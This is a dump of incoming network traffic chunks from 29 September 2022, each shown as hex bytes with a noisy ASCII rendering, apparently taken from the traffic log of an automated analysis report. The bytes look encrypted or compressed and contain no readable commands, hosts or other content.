                                                                                                                                                            2022-09-29 12:44:57 UTC3274INData Raw: 01 7b 17 f6 7d fd 49 c0 e7 1b 45 26 b8 88 1c ad 91 45 4a ff f4 38 8e 75 4e 44 e5 de b6 bf 17 7d cd 98 75 52 14 28 0c e2 7b f8 cc b2 8f 03 a6 88 54 30 a4 a4 45 cd fb ef 64 7f 5d 8d b8 e4 51 de 55 23 6e 4b 8f 6e fb b2 c2 a1 4d 4f 28 33 7f 2d 09 03 53 ec 01 d3 d6 7a 05 3f cf 28 62 4a 3d 21 ba c5 b6 44 fa 34 e7 05 c0 48 ae 4d 2a b4 d7 65 82 4b 83 ae 45 91 58 c6 1b 55 90 77 f2 88 b2 ff e0 cb 13 09 3b 81 b0 e3 57 9d 83 fb c3 09 ca 67 8d c6 1a 02 a6 21 c8 f9 ad 8e 7a 38 42 a1 4d f4 d0 7f d1 5d 70 e2 82 20 a7 7f 68 6a a0 a8 b7 5a a9 cf 36 4b ac 7c 3d 6f 32 76 71 a0 15 f3 cc b7 01 5a 81 06 b9 7c 7b c7 ac ca bb ab 56 f0 5f bb f8 8d f2 be 20 3b e2 ad 14 df bd 4f a9 50 a1 03 54 10 08 0b 79 a2 b2 f4 ff 6e dc 59 8c e2 e6 79 ca d3 17 ad f7 2c 50 a8 7c 46 b5 90 45 17 68
                                                                                                                                                            Data Ascii: {}IE&EJ8uND}uR({T0Ed]QU#nKnMO(3-Sz?(bJ=!D4HM*eKEXUw;Wg!z8BM]p hjZ6K|=o2vqZ|{V_ ;OPTynYy,P|FEh
                                                                                                                                                            2022-09-29 12:44:57 UTC3290INData Raw: 61 2b 33 b6 e2 99 dc b1 15 0e 77 44 70 8c f9 d5 36 80 f1 40 e5 a7 33 c6 64 b7 dc 78 7d 71 fc 6a aa c8 7e df e1 5c 6a ee 4d b6 b7 aa 76 76 a4 10 59 13 4b a8 0f b1 90 c8 84 32 e0 d5 6d 74 dc 19 a7 ff 60 90 38 64 78 fd d3 bf 20 1b 86 fb 70 ff a3 bd 34 40 9a 80 7f ee ca 16 43 9e 11 d8 2a 0f 50 04 05 5d 62 c7 44 d2 56 ce 50 71 ce e3 ef 49 80 7f 29 4b 20 29 34 dc fb 02 39 ad 01 24 43 bf e0 c2 b5 a5 dd 1b 77 03 53 7a e7 a8 34 60 83 de cc af 83 d1 87 69 58 d6 13 44 a4 4f f4 09 fe ed 1e 8b 49 a2 44 b7 17 21 9a e3 03 3a 02 5b 1e 29 1b ff 85 08 75 f2 af 4d d1 30 e1 c1 1c dc 88 50 cb 4a 5c be c7 e3 5d ff a2 06 ec ca df 3b de ad f4 f8 ec b0 d8 be 77 c5 f9 ae 58 ef 46 53 77 ef 03 d0 43 3b 09 01 54 28 29 f7 0a 1d 8c 86 f6 8f c9 2c e8 18 97 fc b7 e6 a5 58 91 78 60 3d be
                                                                                                                                                            Data Ascii: a+3wDp6@3dx}qj~\jMvvYK2mt`8dx p4@C*P]bDVPqI)K )49$CwSz4`iXDOID!:[)uM0PJ\];wXFSwC;T(),Xx`=
                                                                                                                                                            2022-09-29 12:44:57 UTC3306INData Raw: bb f2 f0 f9 21 88 9b 2e 34 d2 63 18 26 1c 07 63 b4 39 c3 21 3a 14 4a 30 ae 4e 76 15 26 c1 76 5d b1 c2 5e f7 2b dd ac 84 cf 10 06 7d a8 9f ff 04 ec aa 0f ae 2d 75 f1 da 6e aa f3 41 05 17 81 dc ed d4 30 92 4c 80 cc 8e 06 34 a2 55 ee 4f 27 6b 76 db ac 97 53 24 56 6a 7d 3b b8 6c 3a 64 e0 7f f1 b5 b6 28 e7 db fb 97 fa 88 51 54 69 a5 42 7a 15 8e af 09 cb d9 dd 90 91 39 a9 c0 04 2f 5e 87 27 cf 0b e5 2f f0 97 30 bb 68 ba 4b a9 61 fd 1e 7b 22 64 0f 15 75 5e c4 c6 53 da 49 8e d0 e1 6d a3 bd 24 43 74 a7 5c b0 31 50 fa dc 56 76 93 ce 25 09 a4 87 ff 05 7a d8 0a 53 17 22 e2 d5 92 9b f3 b5 19 fd 96 07 a3 26 ba 47 3b 9f 31 eb a9 d8 63 74 3b ef 05 e4 a9 2b cc 26 bb c2 0d 6c 9c f2 93 ea 11 78 2c 39 a1 aa 79 3b 17 00 87 f1 2c cb b6 e0 e6 6c 3b 29 12 c8 ab d3 ba a5 7e 52 9e
                                                                                                                                                            Data Ascii: !.4c&c9!:J0Nv&v]^+}-unA0L4UO'kvS$Vj};l:d(QTiBz9/^'/0hKa{"du^SIm$Ct\1PVv%zS"&G;1ct;+&lx,9y;,l;)~R
                                                                                                                                                            2022-09-29 12:44:57 UTC3322INData Raw: be f9 ca e7 36 52 2f 8b 0e cb 96 8a 1d 53 6f 2f f6 13 e7 54 1b 45 7f 5a 0f 73 8a e9 cf 72 f5 47 08 f2 fe df 39 a4 12 0c 95 8e 0a fc bc 53 a4 52 b5 b6 36 7c dd 18 f1 42 2e 1d 49 4c e8 a1 59 0d 3f 98 97 84 c7 63 f4 53 5c 9e 12 da af 71 39 8f 2a 84 6e cb 4e 1e 47 c6 30 09 3d 2d b2 17 a8 d5 04 09 2b c3 79 01 42 21 85 7d 61 ae 53 b8 7a 73 c5 69 b6 a0 21 3f 55 3e f6 80 3d 50 30 26 a4 40 1e d5 cb b8 d8 85 88 d8 35 54 21 32 4b 4b d7 4e 1f ee 8f 9b 6f e1 b6 4b 4a 9e 8a db 26 a8 46 a6 68 97 c7 91 4a 72 f8 b1 2d 98 b6 aa 1a 67 e7 ca 0f 65 ac 03 a2 7c a0 c2 bd 24 09 69 df 57 bc ad 64 cb 39 2d b8 1d 38 a4 17 ae 0d 55 c1 32 19 0e 7e 52 e4 82 5b f5 5d 22 58 fe 35 27 84 50 bf cf 79 30 08 b4 87 0e ab 40 cf f8 85 87 17 6b 88 66 e9 1f 11 3a 44 ea 30 3a 44 3b d2 01 7b f1 9a
                                                                                                                                                            Data Ascii: 6R/So/TEZsrG9SR6|B.ILY?cS\q9*nNG0=-+yB!}aSzsi!?U>=P0&@5T!2KKNoKJ&FhJr-ge|$iWd9-8U2~R[]"X5'Py0@kf:D0:D;{
                                                                                                                                                            2022-09-29 12:44:57 UTC3333INData Raw: b7 c8 71 ce 87 a2 53 43 10 dd a1 e9 ff cf 76 6d d1 1a 4b 8c c9 00 0b 78 5d 30 3f 5c a8 03 80 d0 c4 b8 b0 84 90 97 d3 59 44 22 93 84 cf 89 36 9a f0 0d e9 6b b3 af e6 84 40 e5 14 48 2b ad 44 ac 03 aa 21 d0 d4 4b f6 fb 60 3c 8d c8 a1 67 93 83 91 12 c8 d7 2f c3 71 51 a5 04 7c 6d 8f c7 36 36 6a 2b e6 20 16 c3 e1 15 59 df 4b 21 69 fd c5 2e f5 b0 18 23 b1 c1 a8 95 9f 64 d9 79 da 91 c7 bc 60 b8 8f 42 54 ae 09 45 9e 25 f3 02 9c bf 51 ee 56 fb 8e c5 e0 44 76 57 77 53 4e 7c 4c 9b c2 5c 70 ec 78 e3 3e e0 43 d1 e6 85 d7 d2 5c 15 64 62 ac a6 f6 ff 2e cd 5f 9b 12 d1 36 43 94 11 a6 f2 92 57 81 d7 87 9b 0f 1d a0 a4 04 1e d2 9f c9 08 e6 7f 2b b0 88 83 6a bd 5e 95 27 b0 e0 de 59 70 a6 c3 f4 29 33 56 2b 9e dd b2 50 e2 69 fd d4 9e d6 d1 d3 f3 a3 ec c5 a1 29 c1 ed ce c9 38 0a
                                                                                                                                                            Data Ascii: qSCvmKx]0?\YD"6k@H+D!K`<g/qQ|m66j+ YK!i.#dy`BTE%QVDvWwSN|L\px>C\db._6CW+j^'Yp)3V+Pi)8
                                                                                                                                                            2022-09-29 12:44:57 UTC3349INData Raw: cc ed 98 83 d6 c1 8e da ac fb 60 62 9f 5b 32 3d 1f 16 f9 fd 7c fb 37 d6 c4 6a b8 a5 6a 5a 04 7c 1e f8 3a 10 8b ff b7 ac 41 d2 3b dc f5 9d 44 8e 1d 3a 45 da d7 6e 56 45 7b 21 36 94 cb fd 27 92 cd 07 45 e6 60 64 6a 6b 70 bb 7c cd c1 81 f2 e6 3d 08 86 cd 39 5e ea 98 d5 3c 56 58 51 26 71 97 4c 2a d4 b5 7a 41 31 2c 7b 6a a6 76 e0 ee de 48 5b 9b 96 22 0c e8 ce 56 d7 7d b1 53 57 61 c1 b8 be 60 80 f1 ca 80 75 d5 04 ed f2 e7 db e3 3a ef 48 e2 70 20 c0 00 8d 8c 88 d6 48 1d db 1a 84 e3 4d ee 61 09 ae 00 42 38 7f eb 20 16 0a 6b 5b dd c0 c8 9f 1c c1 ea 68 b7 26 f1 4c f0 9a 86 cc 60 1f f7 ec 37 39 df cc ef 89 09 ff 64 24 21 8e 34 58 bc ca 68 02 40 be 3a 1d 23 c0 90 86 eb be b3 e5 f6 9b 73 40 9c 4c c5 ee 99 12 bc 97 67 c5 53 95 2b 78 9b 5f 04 68 7c 70 9b 23 21 73 97 bd
                                                                                                                                                            Data Ascii: `b[2=|7jjZ|:A;D:EnVE{!6'E`djkp|=9^<VXQ&qL*zA1,{jvH["V}SWa`u:Hp HMaB8 k[h&L`79d$!4Xh@:#s@LgS+x_h|p#!s
                                                                                                                                                            2022-09-29 12:44:57 UTC3365INData Raw: f8 80 79 ec 57 39 db ee 89 18 bc 81 5d 9a cc e3 47 17 4e 52 40 a8 be b7 89 36 bb b4 76 e4 2a 47 d3 40 83 27 65 f4 a4 c0 92 e3 f4 13 16 c2 fc bd eb ba dd eb b5 71 9e 91 cd 4c 9e 26 22 32 0c 17 d2 e8 e0 31 29 24 a6 f8 a4 b5 c5 d5 7e ca bf 16 16 f4 e0 15 90 7e 7c 2c f1 35 34 c9 23 a6 48 83 c6 b6 36 62 c6 3c 00 4b 76 91 9b 07 73 58 15 c8 d3 61 f7 3a 44 ea 10 90 8e 17 cb a1 ce 7c db 71 fa f3 c7 e5 96 e1 32 b4 f3 f3 c8 b5 ce b0 21 b9 63 bb 45 7e 15 d8 23 80 a2 4b dc 25 98 1f 4a 34 77 02 fe ff 90 de a1 c1 eb df 15 7f 49 cb 99 15 2d 9e b0 b0 b9 d4 c7 dd e1 60 e2 d9 62 81 e9 0b 5d 0c 28 3e 06 c2 81 09 14 b9 aa ec 4b 1e 1e 7a 27 03 c1 73 1a 0c 10 8e 18 dd ea ca be 6f 39 18 a0 ce 30 a2 1f a5 6c b7 cc db ac bc eb 20 d8 7a 67 9a c2 94 9b b6 c7 22 57 24 ac 75 f9 b0 c7
                                                                                                                                                            Data Ascii: yW9]GNR@6v*G@'eqL&"21)$~~|,54#H6b<KvsXa:D|q2!cE~#K%J4wI-`b](>Kz'so90l zg"W$u
                                                                                                                                                            2022-09-29 12:44:57 UTC3381INData Raw: 2f e1 06 5b 1b 35 4b 38 11 1c 16 16 e4 42 5c 3e b5 ad 18 25 71 c7 f8 13 96 59 61 d4 85 82 33 99 ab 32 8d c1 7e 99 51 6a c5 6c c0 da 35 24 95 f4 1a 9f b1 4e 4d 18 7f 9c e8 3f 70 f2 02 9b a0 d6 6f 2c 05 a0 ea 03 85 5a 30 42 1d 66 24 28 25 17 41 02 39 ec c8 98 0f 5b 8e 5a 40 32 3b fb b2 08 50 ef 00 a4 94 a0 9d f3 0e d9 8c 8e dc 9c 1a 50 f5 75 0d 78 f0 a2 33 76 10 be 3f 76 98 ee dd 14 68 b5 6f 63 b5 d0 7f 0f fc 42 5b 78 46 ba 6b ed 8a c8 51 ee c7 8d 58 7b f8 31 01 a1 78 34 98 bd b0 cd 90 0c af 7c 0c 64 1b cc b9 dc 27 df dd 24 e6 66 d9 ac 8c a5 85 5f 03 38 72 f2 16 75 68 00 78 25 98 1c 36 b8 79 a1 c2 1b 9b bc 07 40 04 34 8a ad 21 63 c6 5d 04 29 5a f6 15 2b 87 e1 11 d3 eb ff 78 4d 4d b5 ec 97 03 58 ae 6f 23 84 d6 d0 33 22 b8 b5 78 24 c1 13 5c d1 2e 84 c0 1f c1
                                                                                                                                                            Data Ascii: /[5K8B\>%qYa32~Qjl5$NM?po,Z0Bf$(%A9[Z@2;PPux3v?vhocB[xFkQX{1x4|d'$f_8ruhx%6y@4!c])Z+xMMXo#3"x$\.
                                                                                                                                                            2022-09-29 12:44:57 UTC3397INData Raw: 75 5f ff 1a 0d 54 27 75 8f 82 d8 ce 9f 73 c4 ed 9c f9 db 5a ad f2 74 95 7d 36 aa a7 de 2e d8 06 b6 9d 17 d8 07 a6 e7 00 2f 68 99 28 0e 58 79 71 de 80 fe a1 42 5b 4c 00 34 55 82 81 07 ca 41 e9 79 43 0f ea ff fa 3b ea 02 7c f0 29 e7 80 d6 3c a4 e9 c7 cc 88 8d 50 2e af 74 a3 96 02 37 e0 cb 94 72 85 e2 d9 81 7e d7 4f ee 8b cf 55 03 ba 57 ef 56 cf 7e c2 fe 9f 70 86 17 51 62 af 96 cf b9 1f 3f 91 32 b9 4f b0 a2 f4 23 f6 93 2c f5 c0 04 da 95 f8 92 bb 1e b1 68 f2 4d 25 a9 41 9f b6 2e 14 1d aa 43 9b 81 33 ba d2 bc e3 86 31 f1 a4 5e 20 4f dc a8 be c2 5a de b2 8c 78 65 f9 f0 5a 7b 51 71 38 14 f6 36 f4 9e 60 40 0b ef d7 28 78 94 57 49 13 d0 b7 55 3d 06 92 eb 63 8e 6b a9 a8 c7 7d ea 15 4c ae 0d ea 38 c7 36 a4 c4 99 29 09 96 a9 f3 88 e3 71 82 86 8b 78 0e 2d 3b 18 1c 3d
                                                                                                                                                            Data Ascii: u_T'usZt}6./h(XyqB[L4UAyC;|)<P.t7r~OUWV~pQb?2O#,hM%A.C31^ OZxeZ{Qq86`@(xWIU=ck}L86)qx-;=
                                                                                                                                                            2022-09-29 12:44:57 UTC3413INData Raw: 2e b8 a1 9a c5 4c 60 d1 d1 39 74 44 f4 3e a6 69 24 80 5e c6 82 fe 81 e6 71 39 b2 40 63 89 5e c7 d6 d4 a4 f5 19 f1 44 f3 68 9e c6 c9 4f d0 76 96 c3 09 29 00 a0 54 21 88 b7 6b 72 d4 90 ff 2e 24 82 08 bb f8 fe c0 56 1f 01 ec df 04 22 c2 89 4b f2 f9 36 ad d6 63 b3 09 30 6b 1c 0b cd de 41 1e 71 c4 60 f7 a9 0d 45 44 ee f0 6b 96 3c 9a a1 a8 de 31 19 29 37 5c 22 92 01 03 53 57 b9 12 75 1d c2 21 66 f6 84 15 69 62 17 02 21 86 c6 8a 42 1b a5 e6 1b 02 0f 7a fc 7c a9 4c f2 ed 1a b6 e4 14 c6 0f ca 4f d8 50 e4 13 2e b2 c6 8c 8e 91 11 f6 3b 66 f1 fb b8 88 23 eb 02 88 63 db 4f f7 24 e5 25 45 b5 2c 74 88 b7 00 f3 7a 0d 3a 79 53 43 0f 2f 35 52 bc 79 74 0c c9 3f d7 5f c2 b7 4a b5 bd 36 25 95 7b dc 9b 4d 41 f8 38 53 b8 ea 03 04 8a 2e cf 67 dc 47 3a b9 81 14 71 13 42 d2 b5 66
                                                                                                                                                            Data Ascii: .L`9tD>i$^q9@c^DhOv)T!kr.$V"K6c0kAq`EDk<1)7\"SWu!fib!Bz|LOP.;f#cO$%E,tz:ySC/5Ryt?_J6%{MA8S.gG:qBf
                                                                                                                                                            2022-09-29 12:44:57 UTC3429INData Raw: 72 18 e6 70 4f 13 82 f1 08 dd 90 55 89 b1 57 3a f9 88 c3 81 1c a7 65 c7 78 53 31 7c 46 3b 60 3f c1 bf 4e 0d 35 8b 85 7b 82 b4 4b 80 9b c0 25 a8 a6 00 b7 6b 9b 9c fb 1f 2d 2b 65 34 5c 2a 12 dc 31 a2 5b d9 26 eb ee f6 e3 58 7f e1 cc cd 4c cc dc dd d3 4e 2b 41 2b 78 15 00 a9 6b 8d 96 36 5c cf cc 30 96 93 7a 70 3c 1c d5 4a 84 64 14 22 fa d2 38 0f d4 dc ad 63 a7 ab d3 91 a9 76 f2 67 59 e3 c8 dc b5 02 e5 c6 67 ae 60 12 5d 83 de 65 89 9c c0 75 91 8b de 22 9c e4 48 26 f7 b3 1c 24 60 2b fe 93 6c 6a 1f 3f 81 68 92 01 39 84 d4 c1 65 77 14 49 8d 63 d2 07 0c 3d 0d 0a 95 88 e3 02 fc 48 ae 88 11 46 10 da 76 73 13 7e da 13 19 99 9d 5b 49 e6 35 7d 8a e1 46 f2 10 ca 26 18 e9 92 7c c8 d7 22 c9 80 d5 f3 c3 ba 1e 0f 01 75 7b 11 2b 25 6b 3e cf 81 80 28 97 f5 13 5b c4 fb 0f 8b
                                                                                                                                                            Data Ascii: rpOUW:exS1|F;`?N5{K%k-+e4\*1[&XLN+A+xk6\0zp<Jd"8cvgYg`]eu"H&$`+lj?h9ewIc=HFvs~[I5}F&|"u{+%k>([
                                                                                                                                                            2022-09-29 12:44:57 UTC3445INData Raw: 7c 70 85 89 38 bf d5 3b cf 59 3f 5d 04 ff 54 f9 5a ff 39 f3 1a 7d f0 99 d4 29 29 15 3f 43 25 e7 ac 49 89 0f 52 9f 8c 96 8e 7c 26 f7 3d 71 df c0 9b 0f b9 bf 8c f1 72 53 3f dc a2 25 6f 68 fa a3 8f f0 21 0b cf f1 30 4f d1 26 5d a4 fb ec 56 3b ca a8 78 36 8a ab d7 43 e4 96 21 db e2 79 1c f6 f4 62 63 f1 fe e8 d7 cd c1 2d 0e 75 6a 74 2a 78 e5 cb e7 4a 59 c8 d9 36 13 29 8f dc 05 5e 79 50 5a 12 f9 80 5a ae 54 13 6c 03 bf cd 23 23 c9 89 2b 39 26 bf af 55 64 30 8d a6 d3 15 3a 92 34 f9 c9 e1 bd 91 20 31 86 eb 9a a0 73 ea b5 64 eb e8 6f 8d 2f 60 49 9e 12 c6 22 7b 29 19 70 6d 5f ea 0c 19 7b 05 9e 27 50 49 bf ad 0e 9f 33 50 c8 4e b0 4b 86 f6 ef 75 9f 1c 6b 78 40 f2 60 91 75 9b e4 4a 3b 10 7f 60 eb 83 0f 16 4f 06 56 3e 3c 3d 28 85 07 b1 4d a8 89 86 ee d9 c5 b1 13 98 ff
                                                                                                                                                            Data Ascii: |p8;Y?]TZ9}))?C%IR|&=qrS?%oh!0O&]V;x6C!ybc-ujt*xJY6)^yPZZTl##+9&Ud0:4 1sdo/`I"{)pm_{'PI3PNKukx@`uJ;`OV><=(M
                                                                                                                                                            2022-09-29 12:44:57 UTC3461INData Raw: c0 1a 58 90 1f 3e 33 de 6f 3b ff e5 94 8b 4d 3b 2a be 04 ae 5e 7e b8 23 18 23 5d 95 39 fb ef 65 82 20 67 20 a1 aa ae 94 15 58 3b ea 17 40 64 21 42 cc 0d 7e b0 4b 62 5e ce c2 41 4c 59 57 ae b6 64 48 1e b7 f0 61 81 90 e6 25 a8 85 76 36 76 be ad a2 c9 25 48 1e 23 03 97 d5 b1 a6 fa b8 b5 5c 04 88 fd 5f 64 47 07 8b 2b 88 da b7 98 be 9e cc 93 d4 99 28 cf fa c8 67 b8 0d 7d e7 fc b5 0c 1e 23 3f 56 f2 a7 eb ab 8f 1e ba 53 3b 9a 5a 0a 7c d2 54 f4 ae 29 af 9b 45 d6 a7 25 ac 68 a5 d2 94 34 6f 78 68 08 4b 3b 28 64 7f 85 5f e4 3a a2 96 a6 dc e2 68 99 8e 69 bd dd dd bf f2 8d 10 f4 bc b3 7b 56 5f 41 f8 05 a5 20 12 15 80 38 2e cc 76 c1 04 d3 a9 de eb 9b c7 4b 06 04 86 c1 2e 3d 40 d7 28 7e 64 50 ef db a0 56 60 2e 20 4f 77 50 bd 07 72 f1 22 e8 7f c3 1a 9d c4 95 e2 97 14 04
                                                                                                                                                            Data Ascii: X>3o;M;*^~##]9e g X;@d!B~Kb^ALYWdHa%v6v%H#\_dG+(g}#?VS;Z|T)E%h4oxhK;(d_:hi{V_A 8.vK.=@(~dPV`. OwPr"
                                                                                                                                                            2022-09-29 12:44:57 UTC3477INData Raw: 46 b2 93 0e e2 5d 5d 5f de d9 ce 04 06 02 d4 e7 23 49 33 5c c1 8e a7 cd 0a 4a d0 12 0d 42 97 c4 bd 62 e6 ed f3 72 05 a8 0a b7 82 f4 97 96 a5 d2 4e 43 c0 f2 8a 03 4d 6e 8f 84 5b 8d cd ae 47 fe 24 aa cd c1 f5 5f 0a df 61 56 b7 38 12 37 74 06 31 32 91 ee 64 96 28 47 a9 6a 92 8f f3 bc 9a a3 3b a5 20 9b bc 86 a3 97 14 4e a5 d0 51 28 e6 6b cf 15 13 d7 73 a5 82 ff bc c4 14 3a 66 be 32 76 47 47 6a 2e 1a 34 59 a0 eb a3 1e a7 3d c5 98 7a a0 3d 78 a8 ad 23 95 f1 5f a0 f1 f0 62 f3 84 2e b7 bf 07 80 8f bb 2d 08 5a 1a a9 aa db e9 e7 bf fa 7b 62 f8 62 29 f9 16 b1 7e 54 a4 da 9d 4e d7 c3 43 10 91 7d af d9 2c ce 76 1c 0b 30 2b 4f 1b f1 68 49 f4 a4 a1 42 94 b6 27 67 79 96 89 95 00 82 95 56 fd 53 46 11 0f 38 8c f9 17 bd 79 46 02 43 e1 e6 0a 9a be 00 8e 22 cd 4c 45 1c 3e ca
                                                                                                                                                            Data Ascii: F]]_#I3\JBbrNCMn[G$_aV87t12d(Gj; NQ(ks:f2vGGj.4Y=z=x#_b.-Z{bb)~TNC},v0+OhIB'gyVSF8yFC"LE>
                                                                                                                                                            2022-09-29 12:44:57 UTC3493INData Raw: 89 c3 4c 5d e9 cc 96 cf 28 5f 9a bc f8 d5 95 98 53 71 59 67 93 61 c6 af 68 e4 d7 5f 01 e6 81 38 e0 f1 3a b8 73 3a d7 d3 8a a5 99 de ff 04 e4 13 64 b3 d2 53 19 28 8e c9 30 e9 56 49 ce 43 76 e0 d9 9a 2e 08 d8 60 f6 24 a8 b7 42 20 d8 35 95 ab 6b c9 8d 66 9b 6a 17 6c ff 44 02 d1 a1 10 a5 db f9 f7 74 75 76 96 d6 9f 79 b2 20 5a ac d0 ba 52 39 88 4a e1 19 08 7b ad 60 03 ac 59 3c e3 a3 5c 50 76 e6 92 c3 91 b9 e2 1f 68 16 b5 cf 67 e7 5d c5 f1 0b aa 84 b5 9b 9c 1f ca 16 67 bb c3 a5 d0 e9 b0 8e 0c 03 41 7b 0d 2b c4 7b 7b 62 6f a6 c6 99 fe 87 2c b4 f6 83 d7 f4 3e 9f b7 09 6c 42 5a 9b c2 23 dd 73 33 06 a7 41 c5 36 b1 d9 93 f8 4c 48 6c e1 33 67 7a 5c af c6 4d a8 d4 ab 0e 14 b5 bb fb 35 0c 5d 39 a6 02 7b 31 e8 fd c1 1c 1f f5 06 aa 8e 9a 91 bc 20 3f 01 e0 ec 49 f2 d9 f5
                                                                                                                                                            Data Ascii: L](_SqYgah_8:s:dS(0VICv.`$B 5kfjlDtuvy ZR9J{`Y<\Pvhg]gA{+{{bo,>lBZ#s3A6LHl3gz\M5]9{1 ?I
                                                                                                                                                            2022-09-29 12:44:57 UTC3509INData Raw: 9d 84 5c 95 f2 2b f1 d7 9b 9c e3 0b 84 37 b4 f8 8f dd 22 50 f6 ed 80 c5 56 f2 34 4a b1 a7 d2 da 71 c1 3d 91 23 29 6e 8b 68 b3 e5 6c 21 89 b8 5c 32 1f c0 98 76 91 4a 75 eb 4f c5 35 87 d9 33 f8 fd 4c 77 24 87 29 3b a5 a4 3b 72 cf 5f 2d 73 10 cc f8 ec 1f 92 05 c1 ed 46 35 8a 82 7a d5 06 12 53 07 45 80 d8 ed 1f 61 78 e0 7f d4 dc fb 11 b0 5a b0 ec 3d 5e 3d 83 61 ed c2 a3 57 a9 9d 22 0a 71 79 28 6f 04 e5 dd 5b 5a 60 ae 99 79 31 67 ce 2e 0e 9c 14 bc d4 38 d0 01 21 26 c6 6d 40 15 e2 99 75 0e 05 a8 c8 fd 8f 50 f5 39 0f 07 ae 4f 57 f9 49 24 ce 53 70 e6 71 5b d2 59 cf 2c e8 96 5d 27 0e e8 37 0b 7e 02 99 5f 14 e6 6c 8f 06 97 7c 3f d9 9b ca bf 93 5d 62 4c e6 ec f1 ac 69 28 0f fb 99 7b 74 1a b5 c0 5f e7 98 65 32 bc 32 09 91 59 03 a3 71 ba 27 fc 55 07 a2 9a ea 03 ed 04
                                                                                                                                                            Data Ascii: \+7"PV4Jq=#)nhl!\2vJuO53Lw$);;r_-sF5zSEaxZ=^=aW"qy(o[Z`y1g.8!&m@uP9OWI$Spq[Y,]'7~_l|?]bLi({t_e22Yq'U
                                                                                                                                                            2022-09-29 12:44:57 UTC3525INData Raw: c0 16 fe a2 89 ef bc 60 ef ae ac fc 07 0a 45 b5 46 fe 2f a5 f5 5a 3e 3e 3c e2 cf 38 53 6d 85 a6 09 72 3f 3e f0 5f fb 37 70 0d dd cf 67 34 36 a7 98 04 61 c2 ff b0 bd bb 20 7f ac c5 23 0f 6b 36 5c 5a 6b d7 23 b6 61 18 73 2c 48 fb 8c 40 e3 24 94 e5 41 34 29 22 dc a3 81 44 db 98 50 d7 88 0c 6f 0f dd 19 a8 8a 3d 00 27 5a 52 94 71 d1 ce f3 8f d9 28 76 49 46 32 99 14 aa 7d e4 0d ee 63 d2 86 a4 bf 16 f8 91 3e 44 64 3d 55 f6 61 cb 0b 72 a7 da a1 0e dc ef 3f f6 0b 08 7a 2c 24 90 50 31 d2 25 2f d4 77 2e 7e 77 a3 c4 61 45 be 0f e4 14 23 e3 a8 38 03 9c 09 8f c8 df 80 ae 33 19 7e 55 67 05 98 c1 e7 d9 69 24 4e 64 ac 15 a3 9c ca 7e 61 eb 4c 2f 29 9f 50 ec 92 fb 3f 3c e3 1a 83 66 5c 6b c9 fb 85 3f f7 07 ed 17 30 ce 20 73 43 4d 24 5d 3b da 67 53 ab 37 f6 89 f6 05 cf 9c 81
                                                                                                                                                            Data Ascii: `EF/Z>><8Smr?>_7pg46a #k6\Zk#as,H@$A4)"DPo='ZRq(vIF2}c>Dd=Uar?z,$P1%/w.~waE#83~Ugi$Nd~aL/)P?<f\k?0 sCM$];gS7
                                                                                                                                                            2022-09-29 12:44:57 UTC3541INData Raw: ef 65 f1 18 04 11 90 2c 98 41 b2 fb 0d f0 9d 4f cc 5f 8b 5c 75 48 cb af 16 34 54 07 a6 47 bd a6 9e 43 67 26 e5 bd d1 8f 99 c0 d5 9d 7d 1a 87 8e 6b d3 c7 c1 f8 5c 05 d4 77 89 ac 75 0e de 4e 4e 60 7e c6 69 e6 7e 08 00 56 a1 35 ce 92 70 5a 6b 6d 10 fd a4 f1 68 43 29 c9 ed 57 29 a9 0c 01 26 8c 90 4b 77 e5 ec 03 88 79 79 5a 2f f9 69 ab e9 d6 be 64 7d 9b 14 b0 4f 4d 0d f6 41 ad d3 e4 72 d1 a6 bd df 7b b2 00 8c db 63 b4 20 c3 31 43 d5 2c d3 da 32 60 7e 86 56 ec 68 5a 1d f1 69 ab dd 35 cf e9 fd 7b 6c 14 a1 5b 9d 12 09 ea 63 35 f7 67 db 5f 8a 15 fb 8f ec 17 51 81 d2 c9 a9 fb 68 58 9c 52 91 49 f2 41 df 85 a0 13 3e 6c 0d ed 6e 0e 6b 6d 69 d9 e5 00 a5 e3 b5 50 3a 26 1d 12 65 f3 ad 42 da 70 40 43 b5 8a ac 3a 97 c1 e1 08 74 d8 d1 a9 9a fc 60 c0 97 7c 30 ab d7 dc 2d 42
                                                                                                                                                            Data Ascii: e,AO_\uH4TGCg&}k\wuNN`~i~V5pZkmhC)W)&KwyyZ/id}OMAr{c 1C,2`~VhZi5{l[c5g_QhXRIA>lnkmiP:&eBp@C:t`|0-B
                                                                                                                                                            2022-09-29 12:44:57 UTC3557INData Raw: f0 46 32 26 fc a4 30 05 50 ef 19 b6 2d 34 cb 1d 20 a8 89 c9 48 c8 5a f8 73 1e b3 eb 3d fc a0 9a f9 06 4a 2a 37 e9 b3 f1 f7 09 6d b8 3e 3b 7a bb 2c 94 d0 11 4d 54 fc 63 27 20 db 00 c7 67 b4 4b 31 d4 98 f4 80 36 b0 7a 3a 38 70 47 31 78 fa 14 79 2b f6 4b 17 7d 7a a9 83 fc ed 5d cf 18 00 0d 4a 31 37 63 00 15 1e b9 91 12 84 aa 85 9e dd 6a e6 17 fd 05 9d c3 42 44 76 70 a0 de 69 03 56 23 27 e5 4e a4 ef f6 58 ef b1 fc 4f d4 20 46 00 1b b9 f3 a9 32 6f 58 c3 2c ed 3c 25 22 98 82 5c bf b3 f2 62 6a 0a da 6d a3 46 5e 6c 3c 66 77 0a dd 5e b0 f0 75 f8 e3 fb f6 91 46 6e 73 bd 77 ad c7 25 b7 f2 93 09 cc e0 c1 40 5e 00 35 21 05 73 b5 76 7a 8c 8f 6f ab 3f 5a 65 78 36 84 9f b0 5e 4a 42 20 b1 6d b5 4a 50 ec c7 95 82 61 4d 05 fd b9 4d 71 f8 f7 51 ee b6 33 f4 b7 5e 07 75 29 c2
                                                                                                                                                            Data Ascii: F2&0P-4 HZs=J*7m>;z,MTc' gK16z:8pG1xy+K}z]J17cjBDvpiV#'NXO F2oX,<%"\bjmF^l<fw^uFnsw%@^5!svzo?Zex6^JB mJPaMMqQ3^u)
